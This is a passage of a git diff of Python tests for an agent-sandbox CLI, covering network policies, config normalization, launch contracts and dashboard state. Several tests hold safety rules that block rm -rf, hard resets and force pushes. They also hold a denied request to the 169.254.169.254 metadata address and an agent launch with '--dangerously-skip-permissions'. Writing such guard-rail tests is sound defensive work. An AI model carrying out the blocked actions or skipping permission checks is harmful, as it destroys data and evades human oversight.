"inactive", "detail-b"), + ] + result = _serialize_enforcement_status_entries(entries) + assert len(result) == 2 + assert result[0]["surface"] == "a" + assert result[1]["surface"] == "b" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _collect_advisory_warnings +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCollectAdvisoryWarnings: + """Advisory warning collection for config validate display.""" + + def test_no_warnings_for_minimal_config(self, tmp_path: Path) -> None: + with patch("scc_cli.commands.config.config") as mock_config: + mock_config.read_project_config.return_value = None + warnings = _collect_advisory_warnings( + org_config={}, + team_name="team-a", + workspace_path=tmp_path, + effective_network_policy=None, + ) + assert warnings == [] + + def test_auto_resume_advisory(self, tmp_path: Path) -> None: + with patch("scc_cli.commands.config.config") as mock_config: + mock_config.read_project_config.return_value = None + warnings = _collect_advisory_warnings( + org_config={ + "defaults": {"session": {"auto_resume": True}}, + }, + team_name="team-a", + workspace_path=tmp_path, + effective_network_policy=None, + ) + assert any("auto_resume" in w and "advisory" in w for w in warnings) + + def test_team_less_restrictive_warning(self, tmp_path: Path) -> None: + with patch("scc_cli.commands.config.config") as mock_config: + mock_config.read_project_config.return_value = None + warnings = _collect_advisory_warnings( + org_config={ + "defaults": {"network_policy": "locked-down-web"}, + "profiles": {"team-a": {"network_policy": "open"}}, + }, + team_name="team-a", + workspace_path=tmp_path, + effective_network_policy=None, + ) + assert any("less restrictive" in w for w in warnings) + + def test_web_egress_no_proxy_warning(self, tmp_path: Path) -> None: + with ( + patch("scc_cli.commands.config.config") as mock_config, + patch("scc_cli.commands.config.collect_proxy_env", return_value={}), + ): + mock_config.read_project_config.return_value = None + warnings = _collect_advisory_warnings( + org_config={}, + team_name="team-a", + workspace_path=tmp_path, + effective_network_policy="web-egress-enforced", + ) + assert any("proxy" in w.lower() for w in warnings) diff --git a/tests/test_config_explain.py b/tests/test_config_explain.py index 4cdc8e9..0efa58e 100644 --- a/tests/test_config_explain.py +++ b/tests/test_config_explain.py @@ -122,7 +122,7 @@ def effective_config_full(): return EffectiveConfig( plugins={"plugin-a", "plugin-b", "plugin-c"}, mcp_servers=[], - network_policy="corp-proxy", + network_policy="web-egress-enforced", session_config=SessionConfig(timeout_hours=4, auto_resume=True), decisions=[ ConfigDecision( @@ -145,7 +145,7 @@ def effective_config_full(): ), ConfigDecision( field="network_policy", - value="corp-proxy", + value="web-egress-enforced", reason="Organization policy", source="org.defaults", ), @@ -643,12 +643,12 @@ def test_explain_warns_on_auto_resume(self, effective_config_basic): def test_explain_warns_on_team_network_policy(self, effective_config_basic): """Should warn when team network_policy is less restrictive than org default.""" - effective_config_basic.network_policy = "isolated" + effective_config_basic.network_policy = "locked-down-web" org_config = { "schema_version": "1.0.0", "organization": {"name": "Test Org", "id": "test-org"}, - "defaults": {"network_policy": "isolated"}, - "profiles": {"dev": {"description": "Dev team", "network_policy": "unrestricted"}}, + "defaults": {"network_policy": "locked-down-web"}, + "profiles": {"dev": {"description": "Dev team", "network_policy": "open"}}, } with ( @@ -669,12 +669,12 @@ def test_explain_warns_on_team_network_policy(self, effective_config_basic): assert "ignored" in result.output.lower() def test_explain_warns_on_missing_proxy_env(self, effective_config_basic): - """Should warn when corp-proxy-only has no proxy env configured.""" - effective_config_basic.network_policy = "corp-proxy-only" + """Should warn when web-egress-enforced has no proxy env configured.""" + effective_config_basic.network_policy = "web-egress-enforced" org_config = { "schema_version": "1.0.0", "organization": {"name": "Test Org", "id": "test-org"}, - "defaults": {"network_policy": "corp-proxy-only"}, + "defaults": {"network_policy": "web-egress-enforced"}, "profiles": {"dev": {"description": "Dev team"}}, } @@ -953,8 +953,8 @@ def test_active_exceptions_output_format(self, mock_org_config, tmp_path): "scc_cli.commands.config.compute_effective_config", return_value=effective, ), - patch("scc_cli.commands.config.UserStore") as mock_user_store, - patch("scc_cli.commands.config.RepoStore") as mock_repo_store, + patch("scc_cli.commands.config_inspect.UserStore") as mock_user_store, + patch("scc_cli.commands.config_inspect.RepoStore") as mock_repo_store, ): mock_user_store.return_value.read.return_value = exc_file mock_repo_store.return_value.read.return_value = empty_file @@ -1010,8 +1010,8 @@ def test_active_exceptions_shows_scope_badge(self, mock_org_config, tmp_path): "scc_cli.commands.config.compute_effective_config", return_value=effective, ), - patch("scc_cli.commands.config.UserStore") as mock_user_store, - patch("scc_cli.commands.config.RepoStore") as mock_repo_store, + patch("scc_cli.commands.config_inspect.UserStore") as mock_user_store, + patch("scc_cli.commands.config_inspect.RepoStore") as mock_repo_store, ): mock_user_store.return_value.read.return_value = exc_file mock_repo_store.return_value.read.return_value = empty_file @@ -1064,8 +1064,8 @@ def test_expired_exceptions_show_cleanup_hint(self, mock_org_config, tmp_path): "scc_cli.commands.config.compute_effective_config", return_value=effective, ), - patch("scc_cli.commands.config.UserStore") as mock_user_store, - patch("scc_cli.commands.config.RepoStore") as mock_repo_store, + patch("scc_cli.commands.config_inspect.UserStore") as mock_user_store, + patch("scc_cli.commands.config_inspect.RepoStore") as mock_repo_store, ): mock_user_store.return_value.read.return_value = exc_file mock_repo_store.return_value.read.return_value = empty_file diff --git a/tests/test_config_inheritance.py b/tests/test_config_inheritance.py index 583d878..0128d94 100644 --- a/tests/test_config_inheritance.py +++ b/tests/test_config_inheritance.py @@ -30,7 +30,7 @@ def valid_org_config(): "enabled_plugins": ["github-copilot", "internal-docs"], "allowed_plugins": ["*"], "allowed_mcp_servers": ["*.sundsvall.se"], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 8, "auto_resume": True, @@ -374,7 +374,7 @@ def test_org_defaults_only(self, valid_org_config): # Should have org defaults assert "github-copilot" in result.plugins assert "internal-docs" in result.plugins - assert result.network_policy == "corp-proxy-only" + assert result.network_policy == "web-egress-enforced" assert result.session_config.timeout_hours == 8 assert result.session_config.auto_resume is True @@ -466,35 +466,35 @@ def test_team_network_policy_more_restrictive(self, valid_org_config): """Team can tighten org network policy.""" from scc_cli.application.compute_effective_config import compute_effective_config - valid_org_config["defaults"]["network_policy"] = "unrestricted" - valid_org_config["profiles"]["urban-planning"]["network_policy"] = "isolated" + valid_org_config["defaults"]["network_policy"] = "open" + valid_org_config["profiles"]["urban-planning"]["network_policy"] = "locked-down-web" result = compute_effective_config( org_config=valid_org_config, team_name="urban-planning", ) - assert result.network_policy == "isolated" + assert result.network_policy == "locked-down-web" def test_team_network_policy_less_restrictive(self, valid_org_config): """Team cannot loosen org network policy.""" from scc_cli.application.compute_effective_config import compute_effective_config - valid_org_config["defaults"]["network_policy"] = "isolated" - valid_org_config["profiles"]["urban-planning"]["network_policy"] = "unrestricted" + valid_org_config["defaults"]["network_policy"] = "locked-down-web" + valid_org_config["profiles"]["urban-planning"]["network_policy"] = "open" result = compute_effective_config( org_config=valid_org_config, team_name="urban-planning", ) - assert result.network_policy == "isolated" + assert result.network_policy == "locked-down-web" def test_isolated_blocks_network_mcp(self, valid_org_config): """Isolated policy blocks HTTP/SSE MCP servers.""" from scc_cli.application.compute_effective_config import compute_effective_config - valid_org_config["defaults"]["network_policy"] = "isolated" + valid_org_config["defaults"]["network_policy"] = "locked-down-web" valid_org_config["profiles"]["urban-planning"]["additional_mcp_servers"] = [ { "name": "http-mcp", @@ -1297,8 +1297,8 @@ class TestClaudeAdapterWithEffectiveConfig: def test_build_settings_from_effective_config_plugins(self, valid_org_config): """build_settings_from_effective_config should include effective plugins.""" + from scc_cli.adapters.claude_settings import build_settings_from_effective_config from scc_cli.application.compute_effective_config import compute_effective_config - from scc_cli.claude_adapter import build_settings_from_effective_config # Compute effective config effective = compute_effective_config( @@ -1322,8 +1322,8 @@ def test_build_settings_from_effective_config_plugins(self, valid_org_config): def test_build_settings_from_effective_config_mcp_servers(self, valid_org_config): """build_settings_from_effective_config should include MCP servers.""" + from scc_cli.adapters.claude_settings import build_settings_from_effective_config from scc_cli.application.compute_effective_config import compute_effective_config - from scc_cli.claude_adapter import build_settings_from_effective_config effective = compute_effective_config( org_config=valid_org_config, @@ -1343,8 +1343,8 @@ def test_build_settings_from_effective_config_mcp_servers(self, valid_org_config def test_build_settings_blocked_plugins_not_included(self, valid_org_config): """Blocked plugins should not appear in Claude settings.""" + from scc_cli.adapters.claude_settings import build_settings_from_effective_config from scc_cli.application.compute_effective_config import compute_effective_config - from scc_cli.claude_adapter import build_settings_from_effective_config # Block gis-tools valid_org_config["security"]["blocked_plugins"].append("gis-tools") diff --git a/tests/test_config_normalization.py b/tests/test_config_normalization.py index ffc042a..b834ab0 100644 --- a/tests/test_config_normalization.py +++ b/tests/test_config_normalization.py @@ -12,6 +12,11 @@ normalize_project_config, normalize_user_config, ) +from scc_cli.ports.config_models import ( + NormalizedOrgConfig, + SafetyNetConfig, + StatsConfig, +) class TestNormalizeUserConfig: @@ -288,6 +293,208 @@ def test_session_normalized(self) -> None: assert result.session.timeout_hours == 16 +class TestSafetyNetNormalization: + """Test security.safety_net normalization.""" + + def test_missing_safety_net_returns_defaults(self) -> None: + """Missing safety_net section should return default SafetyNetConfig.""" + result = normalize_org_config({"organization": {"name": "Test"}}) + + assert result.security.safety_net.action == "block" + assert result.security.safety_net.rules == {} + + def test_safety_net_with_action(self) -> None: + """Custom action should be preserved.""" + raw = { + "organization": {"name": "Test"}, + "security": {"safety_net": {"action": "warn"}}, + } + result = normalize_org_config(raw) + + assert result.security.safety_net.action == "warn" + + def test_safety_net_with_rules(self) -> None: + """Rules dict should be preserved (D016: stays dict[str, Any]).""" + raw = { + "organization": {"name": "Test"}, + "security": { + "safety_net": { + "action": "block", + "rules": {"no_rm_rf": True, "max_file_size": 1024}, + } + }, + } + result = normalize_org_config(raw) + + assert result.security.safety_net.rules == {"no_rm_rf": True, "max_file_size": 1024} + + def test_safety_net_invalid_type_returns_defaults(self) -> None: + """Non-dict safety_net should return defaults.""" + raw = { + "organization": {"name": "Test"}, + "security": {"safety_net": "invalid"}, + } + result = normalize_org_config(raw) + + assert result.security.safety_net.action == "block" + assert result.security.safety_net.rules == {} + + def test_safety_net_invalid_rules_returns_empty(self) -> None: + """Non-dict rules should normalize to empty dict.""" + raw = { + "organization": {"name": "Test"}, + "security": {"safety_net": {"action": "block", "rules": "not-a-dict"}}, + } + result = normalize_org_config(raw) + + assert result.security.safety_net.rules == {} + + def test_safety_net_config_is_frozen(self) -> None: + """SafetyNetConfig should be immutable.""" + config = SafetyNetConfig(action="warn", rules={"a": True}) + + with pytest.raises(AttributeError): + config.action = "block" # type: ignore[misc] + + def test_security_with_both_safety_net_and_blocklists(self) -> None: + """Safety_net should coexist with existing security fields.""" + raw = { + "organization": {"name": "Test"}, + "security": { + "blocked_plugins": ["bad-plugin"], + "safety_net": {"action": "warn", "rules": {"shell": False}}, + }, + } + result = normalize_org_config(raw) + + assert result.security.blocked_plugins == ("bad-plugin",) + assert result.security.safety_net.action == "warn" + assert result.security.safety_net.rules == {"shell": False} + + +class TestStatsNormalization: + """Test stats normalization.""" + + def test_missing_stats_returns_defaults(self) -> None: + """Missing stats section should return default StatsConfig.""" + result = normalize_org_config({"organization": {"name": "Test"}}) + + assert result.stats.enabled is False + assert result.stats.endpoint is None + + def test_stats_enabled(self) -> None: + """Stats enabled flag should be normalized.""" + raw = { + "organization": {"name": "Test"}, + "stats": {"enabled": True, "endpoint": "https://telemetry.example.com"}, + } + result = normalize_org_config(raw) + + assert result.stats.enabled is True + assert result.stats.endpoint == "https://telemetry.example.com" + + def test_stats_invalid_type_returns_defaults(self) -> None: + """Non-dict stats should return defaults.""" + raw = { + "organization": {"name": "Test"}, + "stats": "invalid", + } + result = normalize_org_config(raw) + + assert result.stats.enabled is False + assert result.stats.endpoint is None + + def test_stats_config_is_frozen(self) -> None: + """StatsConfig should be immutable.""" + config = StatsConfig(enabled=True, endpoint="https://example.com") + + with pytest.raises(AttributeError): + config.enabled = False # type: ignore[misc] + + +class TestConfigSource: + """Test config_source passthrough.""" + + def test_missing_config_source_is_none(self) -> None: + """Missing config_source should default to None.""" + result = normalize_org_config({"organization": {"name": "Test"}}) + + assert result.config_source is None + + def test_config_source_string_preserved(self) -> None: + """String config_source should be preserved.""" + raw = { + "organization": {"name": "Test"}, + "config_source": "https://example.com/org.json", + } + result = normalize_org_config(raw) + + assert result.config_source == "https://example.com/org.json" + + def test_config_source_non_string_coerced(self) -> None: + """Non-string config_source should be coerced to string.""" + raw = { + "organization": {"name": "Test"}, + "config_source": 42, + } + result = normalize_org_config(raw) + + assert result.config_source == "42" + + +class TestNormalizedOrgConfigFromDict: + """Test NormalizedOrgConfig.from_dict() convenience method.""" + + def test_from_dict_returns_normalized_config(self) -> None: + """from_dict should return a properly normalized config.""" + raw = { + "organization": {"name": "FromDict"}, + "security": {"blocked_plugins": ["bad"]}, + } + result = NormalizedOrgConfig.from_dict(raw) + + assert isinstance(result, NormalizedOrgConfig) + assert result.organization.name == "FromDict" + assert result.security.blocked_plugins == ("bad",) + + def test_from_dict_preserves_all_sections(self) -> None: + """from_dict should normalize all sections including new fields.""" + raw = { + "organization": {"name": "Full"}, + "security": {"safety_net": {"action": "warn"}}, + "stats": {"enabled": True}, + "config_source": "test-source", + "profiles": {"team1": {"description": "Team 1"}}, + } + result = NormalizedOrgConfig.from_dict(raw) + + assert result.security.safety_net.action == "warn" + assert result.stats.enabled is True + assert result.config_source == "test-source" + assert "team1" in result.profiles + + def test_from_dict_empty_gives_defaults(self) -> None: + """from_dict with minimal input should give safe defaults.""" + result = NormalizedOrgConfig.from_dict({"organization": {"name": "Min"}}) + + assert result.security.safety_net.action == "block" + assert result.stats.enabled is False + assert result.config_source is None + + def test_from_dict_matches_normalize_org_config(self) -> None: + """from_dict should produce identical results to normalize_org_config.""" + raw = { + "organization": {"name": "Compare"}, + "security": {"safety_net": {"action": "warn", "rules": {"x": True}}}, + "stats": {"enabled": True, "endpoint": "https://example.com"}, + "config_source": "test", + } + from_dict_result = NormalizedOrgConfig.from_dict(raw) + direct_result = normalize_org_config(raw) + + assert from_dict_result == direct_result + + class TestConfigModelImmutability: """Test that config models are immutable (frozen dataclasses).""" diff --git a/tests/test_core_contracts.py b/tests/test_core_contracts.py new file mode 100644 index 0000000..1f742d6 --- /dev/null +++ b/tests/test_core_contracts.py @@ -0,0 +1,247 @@ +"""Tests for the M001/M002 typed core contracts and S01 seam boundary. + +These tests characterize the target shape for the S01 launch-path adoption: +- AgentLaunchSpec and AgentProvider contracts are complete and frozen. +- The S01 boundary expects the prepared launch plan to carry typed provider data, + not Claude-shaped raw settings. +- The executed path should depend on the provider seam, not AgentRunner internals. +""" + +from __future__ import annotations + +from dataclasses import FrozenInstanceError +from datetime import datetime, timezone +from pathlib import Path + +import pytest + +from scc_cli.core.contracts import ( + AgentLaunchSpec, + AuditEvent, + DestinationSet, + EgressRule, + NetworkPolicyPlan, + ProviderCapabilityProfile, + RuntimeInfo, + SafetyPolicy, + SafetyVerdict, +) +from scc_cli.core.enums import NetworkPolicy, SeverityLevel +from scc_cli.ports.agent_provider import AgentProvider +from tests.fakes.fake_agent_provider import FakeAgentProvider + +# --------------------------------------------------------------------------- +# Core typed contracts +# --------------------------------------------------------------------------- + + +def test_network_policy_plan_supports_truthful_policy_contract() -> None: + plan = NetworkPolicyPlan( + mode=NetworkPolicy.WEB_EGRESS_ENFORCED, + destination_sets=( + DestinationSet( + name="anthropic-core", + destinations=("api.anthropic.com",), + required=True, + description="Provider-core access", + ), + ), + egress_rules=( + EgressRule( + target="api.anthropic.com", + allow=True, + reason="provider-core", + protocol="https", + ), + ), + enforced_by_runtime=True, + notes=("proxy topology required",), + ) + + assert plan.mode is NetworkPolicy.WEB_EGRESS_ENFORCED + assert plan.destination_sets[0].required is True + assert plan.egress_rules[0].protocol == "https" + assert plan.enforced_by_runtime is True + + +def test_runtime_and_safety_contracts_are_frozen() -> None: + runtime = RuntimeInfo( + runtime_id="docker", + display_name="Docker Engine", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + rootless=False, + ) + verdict = SafetyVerdict( + allowed=False, + reason="blocked destructive git command", + matched_rule="git.reset_hard", + command_family="destructive-git", + ) + + with pytest.raises(FrozenInstanceError): + runtime.cli_name = "podman" # type: ignore[misc] + with pytest.raises(FrozenInstanceError): + verdict.reason = "changed" # type: ignore[misc] + + +def test_audit_event_captures_shared_network_and_safety_shape() -> None: + before = datetime.now(timezone.utc) + event = AuditEvent( + event_type="network.denied", + message="Blocked private address", + severity=SeverityLevel.WARNING, + subject="169.254.169.254", + metadata={"policy": "locked-down-web", "source": "org.defaults"}, + ) + after = datetime.now(timezone.utc) + + assert event.severity is SeverityLevel.WARNING + assert event.subject == "169.254.169.254" + assert event.metadata["policy"] == "locked-down-web" + assert before <= event.occurred_at <= after + + +def test_agent_provider_protocol_returns_launch_spec() -> None: + provider: AgentProvider = FakeAgentProvider() + profile = provider.capability_profile() + spec = provider.prepare_launch( + config={"mode": "test"}, + workspace=Path("/tmp/workspace"), + settings_path=Path("/tmp/workspace/.fake/settings.json"), + ) + + assert profile.provider_id == "fake" + assert profile.required_destination_set == "fake-core" + assert spec.provider_id == "fake" + assert spec.argv == ("fake-agent",) + assert spec.required_destination_sets == ("fake-core",) + assert spec.artifact_paths == (Path("/tmp/workspace/.fake/settings.json"),) + + +def test_safety_policy_allows_rule_flags_without_loose_top_level_dicts() -> None: + policy = SafetyPolicy( + action="block", + rules={ + "block_reset_hard": True, + "block_force_push": True, + }, + source="org.security.safety_net", + ) + + assert policy.action == "block" + assert policy.rules["block_reset_hard"] is True + assert policy.source == "org.security.safety_net" + + +# --------------------------------------------------------------------------- +# S01 seam boundary characterization +# +# These tests describe the intended S01 boundary contract: +# - The launch plan should be expressible in terms of AgentLaunchSpec. +# - AgentLaunchSpec carries typed provider data (argv, env, artifact_paths), +# not raw Claude-shaped settings dicts. +# - AgentProvider.prepare_launch produces an AgentLaunchSpec that is +# provider-neutral from the core perspective. +# --------------------------------------------------------------------------- + + +def test_agent_launch_spec_is_frozen_and_provider_neutral() -> None: + """AgentLaunchSpec is immutable and carries only provider-neutral typed fields.""" + spec = AgentLaunchSpec( + provider_id="claude", + argv=("claude", "--dangerously-skip-permissions"), + env={"ANTHROPIC_API_KEY": "sk-xxx"}, + workdir=Path("/workspace"), + artifact_paths=(Path("/workspace/.claude/settings.json"),), + required_destination_sets=("anthropic-core",), + ux_addons=(), + ) + + assert spec.provider_id == "claude" + assert spec.argv[0] == "claude" + assert "ANTHROPIC_API_KEY" in spec.env + assert spec.required_destination_sets == ("anthropic-core",) + + with pytest.raises(FrozenInstanceError): + spec.provider_id = "codex" # type: ignore[misc] + + +def test_agent_launch_spec_defaults_are_safe_empty_collections() -> None: + """AgentLaunchSpec fields default to safe empty collections, not None.""" + spec = AgentLaunchSpec( + provider_id="test", + argv=("test-agent",), + ) + + assert spec.env == {} + assert spec.workdir is None + assert spec.artifact_paths == () + assert spec.required_destination_sets == () + assert spec.ux_addons == () + + +def test_provider_capability_profile_carries_provider_core_destination() -> None: + """ProviderCapabilityProfile identifies the provider-core destination set.""" + profile = ProviderCapabilityProfile( + provider_id="claude", + display_name="Claude Code", + required_destination_set="anthropic-core", + supports_resume=True, + supports_skills=True, + supports_native_integrations=True, + ) + + assert profile.required_destination_set == "anthropic-core" + assert profile.supports_resume is True + assert profile.supports_native_integrations is True + + +def test_prepare_launch_produces_spec_with_settings_artifact(tmp_path: Path) -> None: + """AgentProvider.prepare_launch includes settings path in artifact_paths.""" + provider = FakeAgentProvider() + settings_path = tmp_path / ".fake" / "settings.json" + + spec = provider.prepare_launch( + config={"plugins": []}, + workspace=tmp_path, + settings_path=settings_path, + ) + + assert spec.workdir == tmp_path + assert settings_path in spec.artifact_paths + assert spec.env.get("HAS_SETTINGS") == "1" + + +def test_prepare_launch_without_settings_produces_empty_artifact_paths(tmp_path: Path) -> None: + """AgentProvider.prepare_launch without settings produces no artifact paths.""" + provider = FakeAgentProvider() + + spec = provider.prepare_launch( + config={"plugins": []}, + workspace=tmp_path, + settings_path=None, + ) + + assert spec.artifact_paths == () + + +def test_agent_launch_spec_env_is_dict_not_raw_settings_payload() -> None: + """AgentLaunchSpec.env is a plain str-to-str dict, not a raw provider settings payload. + + This characterizes the S01 contract: the runtime layer receives clean env vars, + not a nested Claude-shaped settings blob. Provider adapters are responsible for + translating their settings into env vars before handing back a launch spec. + """ + provider = FakeAgentProvider() + spec = provider.prepare_launch( + config={"plugins": [], "mcpServers": {}}, + workspace=Path("/workspace"), + ) + + # env values must all be strings — no nested dicts or lists + for key, value in spec.env.items(): + assert isinstance(key, str), f"env key {key!r} is not a str" + assert isinstance(value, str), f"env[{key!r}] value {value!r} is not a str" diff --git a/tests/test_dashboard_orchestrator_characterization.py b/tests/test_dashboard_orchestrator_characterization.py new file mode 100644 index 0000000..e151031 --- /dev/null +++ b/tests/test_dashboard_orchestrator_characterization.py @@ -0,0 +1,303 @@ +"""Characterization tests for ui/dashboard/orchestrator.py and application/dashboard.py. + +These tests capture the current behavior of the dashboard orchestration +before S02 surgery decomposes it. They protect against accidental behavior +changes during the split. + +Target: src/scc_cli/ui/dashboard/orchestrator.py (run_dashboard 232 lines, 6% coverage) + +Because run_dashboard is tightly coupled to Rich Live, TUI keypresses, and +the full config stack, we test the pure application-layer logic that the +orchestrator delegates to: + - DashboardFlowState lifecycle + - build_dashboard_view with mock loaders + - handle_dashboard_event routing + - apply_dashboard_effect_result state transitions + - _resolve_tab fallback behavior +""" + +from __future__ import annotations + +from collections.abc import Mapping + +import pytest + +from scc_cli.application.dashboard import ( + ContainerStopEvent, + DashboardEffectRequest, + DashboardFlowOutcome, + DashboardFlowState, + DashboardTab, + DashboardTabData, + PlaceholderItem, + PlaceholderKind, + RefreshEvent, + StartFlowDecision, + StartFlowEvent, + StartFlowResult, + TeamSwitchEvent, + VerboseToggleEvent, + apply_dashboard_effect_result, + build_dashboard_view, + handle_dashboard_event, + placeholder_start_reason, + placeholder_tip, +) +from scc_cli.ui.dashboard.orchestrator import _resolve_tab + + +def _make_empty_tab_data(tab: DashboardTab) -> DashboardTabData: + """Build minimal DashboardTabData for testing.""" + return DashboardTabData( + tab=tab, + title=tab.display_name, + items=[], + count_active=0, + count_total=0, + ) + + +def _make_loader( + tabs: Mapping[DashboardTab, DashboardTabData] | None = None, +) -> object: + """Build a mock data loader that returns all tabs.""" + if tabs is None: + tabs = {tab: _make_empty_tab_data(tab) for tab in DashboardTab} + + def loader(verbose: bool = False) -> Mapping[DashboardTab, DashboardTabData]: + return tabs + + return loader + + +# ═══════════════════════════════════════════════════════════════════════════════ +# build_dashboard_view +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildDashboardView: + """Characterize build_dashboard_view behavior.""" + + def test_default_state_selects_status_tab(self) -> None: + """Default flow state → STATUS tab is active.""" + state = DashboardFlowState() + view, next_state = build_dashboard_view(state, _make_loader()) + assert view.active_tab == DashboardTab.STATUS + + def test_restore_tab_is_honored(self) -> None: + """restore_tab in state → that tab becomes active.""" + state = DashboardFlowState(restore_tab=DashboardTab.SESSIONS) + view, next_state = build_dashboard_view(state, _make_loader()) + assert view.active_tab == DashboardTab.SESSIONS + + def test_restore_tab_cleared_after_use(self) -> None: + """restore_tab is consumed (cleared) after building the view.""" + state = DashboardFlowState(restore_tab=DashboardTab.CONTAINERS) + _, next_state = build_dashboard_view(state, _make_loader()) + assert next_state.restore_tab is None + + def test_toast_message_cleared_after_use(self) -> None: + """toast_message is consumed (cleared) after building the view.""" + state = DashboardFlowState(toast_message="Hello") + view, next_state = build_dashboard_view(state, _make_loader()) + assert view.status_message == "Hello" + assert next_state.toast_message is None + + def test_invalid_restore_tab_falls_back_to_status(self) -> None: + """If restore_tab is not in the loaded tabs, fall back to STATUS.""" + # Provide only STATUS and CONTAINERS tabs + partial_tabs = { + DashboardTab.STATUS: _make_empty_tab_data(DashboardTab.STATUS), + DashboardTab.CONTAINERS: _make_empty_tab_data(DashboardTab.CONTAINERS), + } + state = DashboardFlowState(restore_tab=DashboardTab.WORKTREES) + view, _ = build_dashboard_view(state, _make_loader(partial_tabs)) + assert view.active_tab == DashboardTab.STATUS + + +# ═══════════════════════════════════════════════════════════════════════════════ +# handle_dashboard_event routing +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestHandleDashboardEvent: + """Characterize event → effect/outcome routing.""" + + def test_team_switch_emits_effect(self) -> None: + """TeamSwitchEvent → DashboardEffectRequest with the event as effect.""" + state = DashboardFlowState() + result = handle_dashboard_event(state, TeamSwitchEvent()) + assert isinstance(result, DashboardEffectRequest) + assert isinstance(result.effect, TeamSwitchEvent) + + def test_start_flow_saves_return_tab(self) -> None: + """StartFlowEvent → state preserves return_to tab.""" + state = DashboardFlowState() + event = StartFlowEvent(return_to=DashboardTab.SESSIONS, reason="test") + result = handle_dashboard_event(state, event) + assert isinstance(result, DashboardEffectRequest) + assert result.state.restore_tab == DashboardTab.SESSIONS + + def test_refresh_returns_outcome_not_effect(self) -> None: + """RefreshEvent → DashboardFlowOutcome (no side effect needed).""" + state = DashboardFlowState() + event = RefreshEvent(return_to=DashboardTab.CONTAINERS) + result = handle_dashboard_event(state, event) + assert isinstance(result, DashboardFlowOutcome) + assert result.state.restore_tab == DashboardTab.CONTAINERS + + def test_verbose_toggle_sets_flag_and_toast(self) -> None: + """VerboseToggleEvent → outcome with verbose flag and toast message.""" + state = DashboardFlowState() + event = VerboseToggleEvent(return_to=DashboardTab.WORKTREES, verbose=True) + result = handle_dashboard_event(state, event) + assert isinstance(result, DashboardFlowOutcome) + assert result.state.verbose_worktrees is True + assert result.state.toast_message == "Status on" + + def test_verbose_toggle_off_message(self) -> None: + """VerboseToggleEvent(verbose=False) → 'Status off' toast.""" + state = DashboardFlowState(verbose_worktrees=True) + event = VerboseToggleEvent(return_to=DashboardTab.WORKTREES, verbose=False) + result = handle_dashboard_event(state, event) + assert isinstance(result, DashboardFlowOutcome) + assert result.state.verbose_worktrees is False + assert result.state.toast_message == "Status off" + + +# ══════════════════════════════════════════════════════════════════════════════ +# apply_dashboard_effect_result +# ══════════════════════════════════════════════════════════════════════════════ + + +class TestApplyEffectResult: + """Characterize effect result → state transitions.""" + + def test_start_flow_quit_exits_dashboard(self) -> None: + """StartFlowResult.QUIT → exit_dashboard=True.""" + state = DashboardFlowState() + effect = StartFlowEvent(return_to=DashboardTab.STATUS, reason="test") + result = StartFlowResult(decision=StartFlowDecision.QUIT) + outcome = apply_dashboard_effect_result(state, effect, result) + assert outcome.exit_dashboard is True + + def test_start_flow_launched_exits_dashboard(self) -> None: + """StartFlowResult.LAUNCHED → exit_dashboard=True.""" + state = DashboardFlowState() + effect = StartFlowEvent(return_to=DashboardTab.STATUS, reason="test") + result = StartFlowResult(decision=StartFlowDecision.LAUNCHED) + outcome = apply_dashboard_effect_result(state, effect, result) + assert outcome.exit_dashboard is True + + def test_start_flow_cancelled_stays_with_toast(self) -> None: + """StartFlowResult.CANCELLED → stays on dashboard with toast.""" + state = DashboardFlowState() + effect = StartFlowEvent(return_to=DashboardTab.STATUS, reason="test") + result = StartFlowResult(decision=StartFlowDecision.CANCELLED) + outcome = apply_dashboard_effect_result(state, effect, result) + assert outcome.exit_dashboard is False + assert outcome.state.toast_message == "Start cancelled" + + def test_container_stop_success_toast(self) -> None: + """Successful container stop → success toast message.""" + state = DashboardFlowState() + effect = ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, + container_id="abc", + container_name="test", + ) + outcome = apply_dashboard_effect_result(state, effect, (True, None)) + assert outcome.state.toast_message == "Container stopped" + + def test_container_stop_failure_toast(self) -> None: + """Failed container stop → failure toast message.""" + state = DashboardFlowState() + effect = ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, + container_id="abc", + container_name="test", + ) + outcome = apply_dashboard_effect_result(state, effect, (False, None)) + assert outcome.state.toast_message == "Stop failed" + + def test_container_stop_custom_message(self) -> None: + """Container stop with custom message → uses custom message.""" + state = DashboardFlowState() + effect = ContainerStopEvent( + return_to=DashboardTab.CONTAINERS, + container_id="abc", + container_name="test", + ) + outcome = apply_dashboard_effect_result(state, effect, (True, "Custom msg")) + assert outcome.state.toast_message == "Custom msg" + + def test_start_flow_wrong_result_type_raises(self) -> None: + """StartFlowEvent with wrong result type → TypeError.""" + state = DashboardFlowState() + effect = StartFlowEvent(return_to=DashboardTab.STATUS, reason="test") + with pytest.raises(TypeError, match="StartFlowResult"): + apply_dashboard_effect_result(state, effect, "wrong") + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _resolve_tab fallback +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestResolveTab: + """Characterize _resolve_tab fallback behavior.""" + + def test_none_returns_status(self) -> None: + """None tab name → STATUS.""" + assert _resolve_tab(None) == DashboardTab.STATUS + + def test_empty_string_returns_status(self) -> None: + """Empty string → STATUS.""" + assert _resolve_tab("") == DashboardTab.STATUS + + def test_valid_tab_name_resolved(self) -> None: + """Valid enum name → matching tab.""" + assert _resolve_tab("CONTAINERS") == DashboardTab.CONTAINERS + assert _resolve_tab("SESSIONS") == DashboardTab.SESSIONS + + def test_invalid_tab_name_returns_status(self) -> None: + """Invalid tab name → falls back to STATUS.""" + assert _resolve_tab("NONEXISTENT") == DashboardTab.STATUS + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Placeholder helpers +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestPlaceholderHelpers: + """Characterize placeholder utility functions.""" + + def test_tip_for_no_containers(self) -> None: + """NO_CONTAINERS placeholder has actionable tip.""" + tip = placeholder_tip(PlaceholderKind.NO_CONTAINERS) + assert "start" in tip.lower() or "scc start" in tip + + def test_tip_for_no_sessions(self) -> None: + """NO_SESSIONS placeholder has actionable tip.""" + tip = 